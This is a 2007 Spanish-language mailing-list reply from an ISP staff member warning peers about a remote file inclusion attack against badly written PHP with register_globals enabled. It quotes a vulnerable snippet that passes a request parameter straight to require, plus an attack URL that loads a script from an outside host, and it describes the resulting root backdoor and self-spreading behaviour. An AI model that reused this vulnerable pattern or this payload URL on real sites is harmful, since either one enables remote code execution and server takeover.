At 14:10 26-08-2007, Rodrigo Fuentealba wrote: >El 26/08/07, Miguel Oyarzo O. <[EMAIL PROTECTED]> escribió: > > > > Estimados > > > > Detecte un ataque muy peligroso cuyo modus operandis es mendiante la carga > > de escripts via archivos PHP mal programados. > >¿Es una vulnerabilidad de PHP o una vulnerabilidad programada en PHP?
PhP diria yo. Por ejemplo.. los que tienen register_globals on estan expuestos, siempre y cuando tengan script PHP q trataen a la variable de error como un require. Hay varios script PHP simples y complejos que traen pifias asi. Si file send.php es algo como: <?if (isset($_GET['error'])) { require($_REQUEST["error"] );}?> El atacante usara algo asi http://elsitio.cl/sendmail.php?error=http://masterz.altervista.org/b El shelcode, como mencionaba, se las arregla para obtener provilegios root, abre una puerta y acepta conexiones remotas. Ademas, el mismo script al parecer agrega a otros script PHP la simple sentencia <?php ?> anterior (se preplica creo). Saludos, Miguel Oyarzo O. Austro Internet S.A. Punta Arenas